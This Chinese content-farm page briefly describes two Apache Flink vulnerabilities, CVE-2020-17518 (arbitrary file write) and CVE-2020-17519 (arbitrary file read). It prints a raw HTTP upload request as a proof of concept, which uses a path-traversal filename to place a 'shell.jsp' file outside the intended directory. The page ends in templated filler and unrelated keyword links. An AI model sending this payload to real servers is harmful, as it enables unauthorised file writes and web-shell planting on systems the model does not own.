Apache Flink POC漏洞CVE-2020-17518/17519的示例分析
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可
千家信息网最后更新 2025年12月02日Apache Flink POC漏洞CVE-2020-17518/17519的示例分析
今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
CVE-2020-17518: 文件写入
攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)
CVE-2020-17519: 文件读取
Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)
POC:
POST /jars/upload HTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../etc/shell.jsp"success------WebKitFormBoundaryoZ8meKnrrso89R6Y--
看完上述内容,你们对 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
文件
内容
进程
漏洞
示例
分析
攻击者
系统
攻击
位置
更多
知识
篇文章
行业
资讯
资讯频道
频道
进一
支持
有关
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
军人网络安全教育课件
昆明系统软件开发
数据库售票系统
商品交易软件开发
软件开发用户需求例子
蒲公英软件开发公司
远程服务器提示没有登录成功
mysql还原指定数据库
电脑显示数据库参数错误
云南计算软件开发公司
军人如何网络安全
数据库密码反编译
网络安全方面的培训
隆尧网络安全宣传片
数据库设计一对多
西宁网络存储服务器
桓台软件开发价格
搭建版本管理服务器
福建有口碑的软件开发模型
java服务器通信
软件开发工程师前端开发职位说明
无线传感器网络技术第九章
天锐绿盾如何转移服务器
五年制高职计算机网络技术学什么
手机网页服务器
护航国庆网络安全
软件开发工程师面试模板
高中网络技术考试重要知识点
上海服务器硬盘测评
A_fst服务器
